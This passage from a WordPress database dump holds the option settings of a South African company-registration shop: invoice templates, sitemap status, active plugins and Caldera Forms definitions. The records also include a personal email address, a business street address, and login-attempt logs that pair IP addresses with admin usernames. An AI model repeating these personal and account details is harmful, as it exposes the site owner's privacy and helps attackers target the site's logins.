Note','yes'),(1418,'wcj_invoicing_credit_note_admin_column_create_btn','Create','yes'),(1419,'wcj_invoicing_credit_note_admin_column_delete_btn','Delete','yes'),(1420,'wcj_invoicing_credit_note_enabled_for_customers','no','yes'),(1421,'wcj_invoicing_credit_note_link_text','Credit Note','yes'),(440804,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1422,'wcj_invoicing_credit_note_save_as_enabled','yes','yes'),(1423,'wcj_invoicing_credit_note_file_name','[wcj_credit_note_number]','yes'),(1424,'wcj_invoicing_custom_doc_admin_orders_page_column','yes','yes'),(1425,'wcj_invoicing_custom_doc_admin_page_column_text','Custom Document','yes'),(1426,'wcj_invoicing_custom_doc_admin_column_create_btn','Create','yes'),(440805,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1427,'wcj_invoicing_custom_doc_admin_column_delete_btn','Delete','yes'),(1428,'wcj_invoicing_custom_doc_enabled_for_customers','no','yes'),(1429,'wcj_invoicing_custom_doc_link_text','Custom Document','yes'),(1430,'wcj_invoicing_custom_doc_save_as_enabled','yes','yes'),(1431,'wcj_invoicing_custom_doc_file_name','[wcj_custom_doc_number]','yes'),(440806,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1433,'su_option_version','5.0.0','no'),(1434,'bewpi-install-date','2016-03-26','yes'),(1435,'wr_contactform_do_activation_redirect','No','yes'),(1436,'yikes_woocommerce_custom_product_tabs_db_version','1.5.16','yes'),(1437,'widget_shortcodes-ultimate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1438,'widget_smartslider3','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1439,'widget_wcj_widget_multicurrency','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1440,'bewpi_general_settings','a:7:{s:27:\"bewpi_disable_free_products\";i:0;s:14:\"bewpi_view_pdf\";s:8:\"download\";s:30:\"bewpi_download_invoice_account\";s:1:\"1\";s:17:\"bewpi_email_it_in\";i:0;s:25:\"bewpi_email_it_in_account\";s:0:\"\";s:27:\"bewpi_invoice_number_column\";i:1;s:17:\"bewpi_email_types\";a:2:{i:0;s:9:\"new_order\";i:1;s:24:\"customer_completed_order\";}}','yes'),(1441,'bewpi_template_settings','a:36:{s:19:\"bewpi_template_name\";s:5:\"micro\";s:17:\"bewpi_color_theme\";s:7:\"#632556\";s:22:\"bewpi_theme_text_black\";s:1:\"0\";s:17:\"bewpi_date_format\";s:5:\"d M Y\";s:29:\"bewpi_display_prices_incl_tax\";s:1:\"0\";s:22:\"bewpi_shipping_taxable\";s:1:\"0\";s:25:\"bewpi_show_payment_status\";s:1:\"1\";s:27:\"bewpi_disable_packing_slips\";s:1:\"0\";s:18:\"bewpi_company_logo\";s:114:\"https://companyregistration.online/wp-content/uploads/2017/06/companyregistration-business-card-e1511814887749.png\";s:18:\"bewpi_company_name\";s:41:\"MAW Inc  [www.companyregistration.online]\";s:21:\"bewpi_company_address\";s:53:\"  112 Rose Avenue\r\n  Lenasia\r\n  Johannesburg \r\n  1827\";s:21:\"bewpi_company_details\";s:55:\"www.companyregistration.online is a division of MAW Inc\";s:19:\"bewpi_company_phone\";s:0:\"\";s:27:\"bewpi_company_email_address\";s:0:\"\";s:20:\"bewpi_company_vat_id\";s:0:\"\";s:11:\"bewpi_title\";s:7:\"Invoice\";s:16:\"bewpi_intro_text\";s:28:\"Thank you for your purchase!\";s:18:\"bewpi_show_ship_to\";s:1:\"1\";s:25:\"bewpi_show_customer_notes\";s:1:\"1\";s:11:\"bewpi_terms\";s:46:\"Refer to terms and conditions when purchasing.\";s:24:\"bewpi_left_footer_column\";s:38:\"<b>Payment method</b> [payment_method]\";s:25:\"bewpi_right_footer_column\";s:55:\"www.companyregistration.online is a division of MAW Inc\";s:25:\"bewpi_invoice_number_type\";s:24:\"woocommerce_order_number\";s:19:\"bewpi_reset_counter\";s:1:\"0\";s:25:\"bewpi_next_invoice_number\";s:5:\"29006\";s:27:\"bewpi_invoice_number_digits\";s:1:\"4\";s:27:\"bewpi_invoice_number_prefix\";s:0:\"\";s:27:\"bewpi_invoice_number_suffix\";s:0:\"\";s:27:\"bewpi_invoice_number_format\";s:12:\"[number]-[Y]\";s:26:\"bewpi_reset_counter_yearly\";s:1:\"0\";s:14:\"bewpi_show_sku\";s:1:\"1\";s:19:\"bewpi_show_subtotal\";s:1:\"1\";s:14:\"bewpi_show_tax\";s:1:\"0\";s:20:\"bewpi_show_tax_total\";s:1:\"1\";s:19:\"bewpi_show_discount\";s:1:\"1\";s:19:\"bewpi_show_shipping\";s:1:\"0\";}','yes'),(1442,'su_option_custom-formatting','on','yes'),(1443,'su_option_skip','on','yes'),(1444,'su_option_prefix','su_','yes'),(1445,'su_option_hotkey','alt+i','yes'),(1446,'su_option_skin','default','yes'),(1447,'su_option_custom-css','','yes'),(1448,'sunrise_defaults_su','1','yes'),(1450,'sm_rewrite_done','$Id: sitemap-loader.php 937300 2014-06-23 18:04:11Z arnee $','yes'),(1456,'wr_contactform_load_bootstrap_js','0','no'),(1457,'wr_contactform_load_bootstrap_css','0','no'),(1458,'wr_contactform_default_mail_from','info@companyregistration.online','no'),(1459,'wr_contactform_global_captcha_setting','2','no'),(1462,'wr_contactform_style','','no'),(1466,'sm_options','a:52:{s:18:\"sm_b_prio_provider\";s:41:\"GoogleSitemapGeneratorPrioByCountProvider\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_pingmsn\";b:1;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:1;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.6;s:15:\"sm_pr_posts_min\";d:0.2;s:11:\"sm_pr_pages\";d:0.6;s:10:\"sm_pr_cats\";d:0.3;s:10:\"sm_pr_arch\";d:0.3;s:10:\"sm_pr_auth\";d:0.3;s:10:\"sm_pr_tags\";d:0.3;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";i:1457731204;s:16:\"sm_i_hide_survey\";b:1;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";s:20:\"dce938aad79a92d7863a\";s:13:\"sm_i_lastping\";i:1566901588;s:16:\"sm_i_supportfeed\";b:1;s:22:\"sm_i_supportfeed_cache\";i:1566683517;}','yes'),(1467,'sm_status','O:28:\"GoogleSitemapGeneratorStatus\":4:{s:39:\"\0GoogleSitemapGeneratorStatus\0startTime\";d:1566901587.736984;s:37:\"\0GoogleSitemapGeneratorStatus\0endTime\";d:1566901588.355315;s:41:\"\0GoogleSitemapGeneratorStatus\0pingResults\";a:2:{s:6:\"google\";a:5:{s:9:\"startTime\";d:1566901587.740856;s:7:\"endTime\";d:1566901587.856393;s:7:\"success\";b:1;s:3:\"url\";s:109:\"http://www.google.com/webmasters/sitemaps/ping?sitemap=https%3A%2F%2Fcompanyregistration.online%2Fsitemap.xml\";s:4:\"name\";s:6:\"Google\";}s:4:\"bing\";a:5:{s:9:\"startTime\";d:1566901587.857081;s:7:\"endTime\";d:1566901588.353608;s:7:\"success\";b:1;s:3:\"url\";s:102:\"http://www.bing.com/webmaster/ping.aspx?siteMap=https%3A%2F%2Fcompanyregistration.online%2Fsitemap.xml\";s:4:\"name\";s:4:\"Bing\";}}s:38:\"\0GoogleSitemapGeneratorStatus\0autoSave\";b:1;}','no'),(1507,'ep_exclude_pages','','yes'),(1567,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(1569,'general_options','','yes'),(1570,'pricing_options','','yes'),(1578,'wcj_options','','yes'),(1662,'limit_login_retries','a:1:{s:15:\"165.255.168.204\";i:1;}','no'),(1663,'limit_login_retries_valid','a:1:{s:15:\"165.255.168.204\";i:1563490891;}','no'),(1664,'limit_login_lockouts','a:0:{}','yes'),(1665,'limit_login_logged','a:4:{s:12:\"41.144.98.31\";a:1:{s:12:\"Shop Manager\";i:1;}s:14:\"197.228.147.65\";a:1:{s:11:\"shopmanager\";i:1;}s:14:\"162.158.26.109\";a:1:{s:19:\"companyregistration\";i:1;}s:12:\"172.68.51.25\";a:1:{s:19:\"companyregistration\";i:1;}}','no'),(1666,'limit_login_lockouts_total','4','no'),(1693,'woocommerce_admin_notices','a:1:{i:0;s:6:\"update\";}','yes'),(1859,'product_shipping_class_children','a:0:{}','yes'),(440807,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1935,'_wp_session_82129036fa731031ff75362207737984','a:1:{s:12:\"logged_in_at\";N;}','no'),(2200,'su_presets_spoiler','a:1:{s:9:\"last_used\";a:3:{s:2:\"id\";s:9:\"last_used\";s:4:\"name\";s:18:\"Last used settings\";s:8:\"settings\";a:7:{s:5:\"title\";s:11:\"Description\";s:4:\"open\";s:2:\"no\";s:5:\"style\";s:7:\"default\";s:4:\"icon\";s:4:\"plus\";s:6:\"anchor\";s:0:\"\";s:5:\"class\";s:0:\"\";s:7:\"content\";s:245:\"•	When applying for a tender\n•	In order for you to register on any private or public supplier    database\n•Certain suppliers may require a Tax Clearance Certificate before payment can be made to you.\n•To deregister the company with CIPC.\";}}}','yes'),(2227,'su_presets_tab','a:1:{s:9:\"last_used\";a:3:{s:2:\"id\";s:9:\"last_used\";s:4:\"name\";s:18:\"Last used settings\";s:8:\"settings\";a:7:{s:5:\"title\";s:11:\"Description\";s:8:\"disabled\";s:2:\"no\";s:6:\"anchor\";s:0:\"\";s:3:\"url\";s:0:\"\";s:6:\"target\";s:5:\"blank\";s:5:\"class\";s:0:\"\";s:7:\"content\";s:248:\"The MOI is defined as a document that sets out the rights and responsibilities of shareholders, directors and other within a company, and by which a company is incorporated in the Act, or by which a pre-existing company was structured and governed.\";}}}','yes'),(2565,'wcj_custom_product_tabs_global_hide_in_products_1','','yes'),(2566,'wcj_custom_product_tabs_global_show_in_products_1','','yes'),(2567,'wcj_custom_product_tabs_global_hide_in_cats_1','','yes'),(2568,'wcj_custom_product_tabs_global_show_in_cats_1','','yes'),(2569,'wcj_custom_product_tabs_global_hide_in_tags_1','','yes'),(2570,'wcj_custom_product_tabs_global_show_in_tags_1','','yes'),(2571,'wcj_shipping_left_to_free_info_enabled_cart','no','yes'),(2572,'wcj_shipping_left_to_free_info_content_cart','%left_to_free% left to free shipping','yes'),(440819,'active_plugins','a:24:{i:0;s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";i:1;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:2;s:67:\"autocomplete-woocommerce-orders/autocomplete-woocommerce-orders.php\";i:3;s:15:\"bloom/bloom.php\";i:4;s:31:\"cartflows-pro/cartflows-pro.php\";i:5;s:23:\"cartflows/cartflows.php\";i:6;s:31:\"code-snippets/code-snippets.php\";i:7;s:27:\"coming-soon/coming-soon.php\";i:8;s:63:\"es-woocommerce-activecampaign/es-woocommerce-activecampaign.php\";i:9;s:36:\"google-sitemap-generator/sitemap.php\";i:10;s:25:\"hurrytimer/hurrytimer.php\";i:11;s:50:\"official-facebook-pixel/facebook-for-wordpress.php\";i:12;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";i:13;s:37:\"rocket-lazy-load/rocket-lazy-load.php\";i:14;s:45:\"shortpixel-adaptive-images/short-pixel-ai.php\";i:15;s:63:\"woo-cart-abandonment-recovery/woo-cart-abandonment-recovery.php\";i:16;s:69:\"woo-gutenberg-products-block/woocommerce-gutenberg-products-block.php\";i:18;s:85:\"woocommerce-google-analytics-integration/woocommerce-google-analytics-integration.php\";i:19;s:47:\"woocommerce-payfast-gateway/gateway-payfast.php\";i:20;s:38:\"woocommerce-pdf-invoices/bootstrap.php\";i:21;s:27:\"woocommerce/woocommerce.php\";i:22;s:23:\"wordfence/wordfence.php\";i:23;s:27:\"wp-optimize/wp-optimize.php\";i:24;s:97:\"yikes-inc-easy-custom-woocommerce-product-tabs/yikes-inc-easy-custom-woocommerce-product-tabs.php\";}','yes'),(2573,'wcj_shipping_left_to_free_info_position_cart','woocommerce_after_cart_totals','yes'),(2574,'wcj_shipping_left_to_free_info_priority_cart','10','yes'),(2575,'wcj_shipping_left_to_free_info_enabled_mini_cart','no','yes'),(2576,'wcj_shipping_left_to_free_info_content_mini_cart','%left_to_free% left to free shipping','yes'),(2577,'wcj_shipping_left_to_free_info_position_mini_cart','woocommerce_after_mini_cart','yes'),(2578,'wcj_shipping_left_to_free_info_priority_mini_cart','10','yes'),(2579,'wcj_shipping_left_to_free_info_enabled_checkout','no','yes'),(2580,'wcj_shipping_left_to_free_info_content_checkout','%left_to_free% left to free shipping','yes'),(2581,'wcj_shipping_left_to_free_info_position_checkout','woocommerce_checkout_after_order_review','yes'),(2582,'wcj_shipping_left_to_free_info_priority_checkout','10','yes'),(2583,'wcj_order_number_use_mysql_transaction_enabled','no','yes'),(2584,'wcj_currency_KIP','KIP','yes'),(2585,'wcj_price_by_country_selection','comma_list','yes'),(2586,'wcj_invoicing_general_header_images_path','empty','yes'),(2587,'widget_wcj_widget_left_to_free_shipping','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2866,'_calderaforms_lastupdate','1.5.5','yes'),(2867,'widget_caldera_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2868,'_caldera_forms_styleincludes','a:3:{s:5:\"alert\";b:1;s:4:\"form\";b:1;s:4:\"grid\";b:1;}','yes'),(2869,'_caldera_forms','a:4:{s:15:\"CF56f6fc44b6d4f\";a:17:{s:13:\"_last_updated\";s:31:\"Fri, 21 Aug 2015 00:33:50 +0000\";s:2:\"ID\";s:15:\"CF56f6fc44b6d4f\";s:4:\"name\";s:9:\"Test Form\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:0:\"\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:8:{s:11:\"fld_4338248\";s:3:\"1:1\";s:11:\"fld_1316929\";s:3:\"1:1\";s:11:\"fld_6796077\";s:3:\"1:1\";s:11:\"fld_5987102\";s:3:\"1:1\";s:11:\"fld_3993413\";s:3:\"2:1\";s:11:\"fld_5161425\";s:3:\"2:2\";s:11:\"fld_8997460\";s:3:\"3:1\";s:11:\"fld_1338703\";s:3:\"3:2\";}s:9:\"structure\";s:10:\"12|6:6|6:6\";}s:6:\"fields\";a:8:{s:11:\"fld_1316929\";a:7:{s:2:\"ID\";s:11:\"fld_1316929\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:7:\"Two Big\";s:4:\"slug\";s:7:\"two_big\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:5;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw19946608611\";a:1:{s:12:\"cl3564295763\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1533135\";}}}}}s:11:\"fld_4338248\";a:7:{s:2:\"ID\";s:11:\"fld_4338248\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:3:\"One\";s:4:\"slug\";s:3:\"one\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:10;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw47185924125\";a:1:{s:12:\"cl5675243200\";a:3:{s:5:\"field\";s:11:\"fld_3993413\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1697235\";}}}}}s:11:\"fld_5987102\";a:7:{s:2:\"ID\";s:11:\"fld_5987102\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:4:\"Base\";s:4:\"slug\";s:4:\"base\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:25;}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_3993413\";a:7:{s:2:\"ID\";s:11:\"fld_3993413\";s:4:\"type\";s:8:\"checkbox\";s:5:\"label\";s:14:\"Want Option 1?\";s:4:\"slug\";s:8:\"option_1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:6:\"inline\";i:1;s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:1:{s:10:\"opt1697235\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Yes\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_5161425\";a:7:{s:2:\"ID\";s:11:\"fld_5161425\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:13:\"Option 2 Type\";s:4:\"slug\";s:8:\"option_2\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:2:{s:10:\"opt1533135\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Big\";}s:10:\"opt1786217\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Small\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_8997460\";a:7:{s:2:\"ID\";s:11:\"fld_8997460\";s:4:\"type\";s:11:\"calculation\";s:5:\"label\";s:5:\"Total\";s:4:\"slug\";s:5:\"total\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:10:{s:12:\"custom_class\";s:0:\"\";s:7:\"element\";s:2:\"h3\";s:7:\"classes\";s:10:\"total-line\";s:6:\"before\";s:6:\"Total:\";s:5:\"after\";s:0:\"\";s:5:\"fixed\";i:1;s:18:\"thousand_separator\";s:1:\",\";s:8:\"formular\";s:53:\" ( fld_5987102+fld_4338248+fld_6796077+fld_1316929 ) \";s:6:\"config\";a:1:{s:5:\"group\";a:1:{i:0;a:1:{s:5:\"lines\";a:4:{i:0;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_5987102\";}i:1;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_4338248\";}i:2;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_6796077\";}i:3;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_1316929\";}}}}}s:14:\"manual_formula\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_1338703\";a:7:{s:2:\"ID\";s:11:\"fld_1338703\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:3:\"Pay\";s:4:\"slug\";s:3:\"pay\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_6796077\";a:7:{s:2:\"ID\";s:11:\"fld_6796077\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:9:\"Two Small\";s:4:\"slug\";s:9:\"two_small\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:1;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw74415141932\";a:1:{s:12:\"cl7168988428\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1786217\";}}}}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:1:{s:9:\"on_insert\";i:1;}}s:15:\"CF56f703597f336\";a:15:{s:13:\"_last_updated\";s:31:\"Sat, 26 Mar 2016 23:28:46 +0000\";s:2:\"ID\";s:15:\"CF56f703597f336\";s:10:\"cf_version\";s:7:\"1.3.3.1\";s:4:\"name\";s:21:\"Test form no template\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:10:\"page_names\";a:2:{i:0;s:6:\"Page 1\";i:1;s:6:\"Page 2\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:19:\"imraanmaw@gmail.com\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:21:\"Test form no template\";s:13:\"email_message\";s:9:\"{summary}\";}}s:15:\"CF56f9267c4a9bd\";a:15:{s:13:\"_last_updated\";s:31:\"Mon, 28 Mar 2016 18:05:01 +0000\";s:2:\"ID\";s:15:\"CF56f9267c4a9bd\";s:10:\"cf_version\";s:7:\"1.3.3.1\";s:4:\"name\";s:25:\"Company Registration Form\";s:11:\"description\";s:56:\"This form is used for all private company registrations.\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:19:\"imraanmaw@gmail.com\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:25:\"Company Registration Form\";s:13:\"email_message\";s:9:\"{summary}\";}}s:15:\"CF56f9709d16af8\";a:15:{s:13:\"_last_updated\";s:31:\"Tue, 29 Mar 2016 14:17:52 +0000\";s:2:\"ID\";s:15:\"CF56f9709d16af8\";s:10:\"cf_version\";s:7:\"1.3.3.1\";s:4:\"name\";s:10:\"Contact us\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:19:\"imraanmaw@gmail.com\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:10:\"Contact us\";s:13:\"email_message\";s:9:\"{summary}\";}}}','yes'),(2870,'CF56f6fc44b6d4f','a:17:{s:13:\"_last_updated\";s:31:\"Fri, 21 Aug 2015 00:33:50 +0000\";s:2:\"ID\";s:15:\"CF56f6fc44b6d4f\";s:4:\"name\";s:9:\"Test Form\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:0:\"\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:8:{s:11:\"fld_4338248\";s:3:\"1:1\";s:11:\"fld_1316929\";s:3:\"1:1\";s:11:\"fld_6796077\";s:3:\"1:1\";s:11:\"fld_5987102\";s:3:\"1:1\";s:11:\"fld_3993413\";s:3:\"2:1\";s:11:\"fld_5161425\";s:3:\"2:2\";s:11:\"fld_8997460\";s:3:\"3:1\";s:11:\"fld_1338703\";s:3:\"3:2\";}s:9:\"structure\";s:10:\"12|6:6|6:6\";}s:6:\"fields\";a:8:{s:11:\"fld_1316929\";a:7:{s:2:\"ID\";s:11:\"fld_1316929\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:7:\"Two Big\";s:4:\"slug\";s:7:\"two_big\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:5;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw19946608611\";a:1:{s:12:\"cl3564295763\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1533135\";}}}}}s:11:\"fld_4338248\";a:7:{s:2:\"ID\";s:11:\"fld_4338248\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:3:\"One\";s:4:\"slug\";s:3:\"one\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:10;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw47185924125\";a:1:{s:12:\"cl5675243200\";a:3:{s:5:\"field\";s:11:\"fld_3993413\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1697235\";}}}}}s:11:\"fld_5987102\";a:7:{s:2:\"ID\";s:11:\"fld_5987102\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:4:\"Base\";s:4:\"slug\";s:4:\"base\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:25;}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_3993413\";a:7:{s:2:\"ID\";s:11:\"fld_3993413\";s:4:\"type\";s:8:\"checkbox\";s:5:\"label\";s:14:\"Want Option 1?\";s:4:\"slug\";s:8:\"option_1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:6:\"inline\";i:1;s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:1:{s:10:\"opt1697235\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Yes\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_5161425\";a:7:{s:2:\"ID\";s:11:\"fld_5161425\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:13:\"Option 2 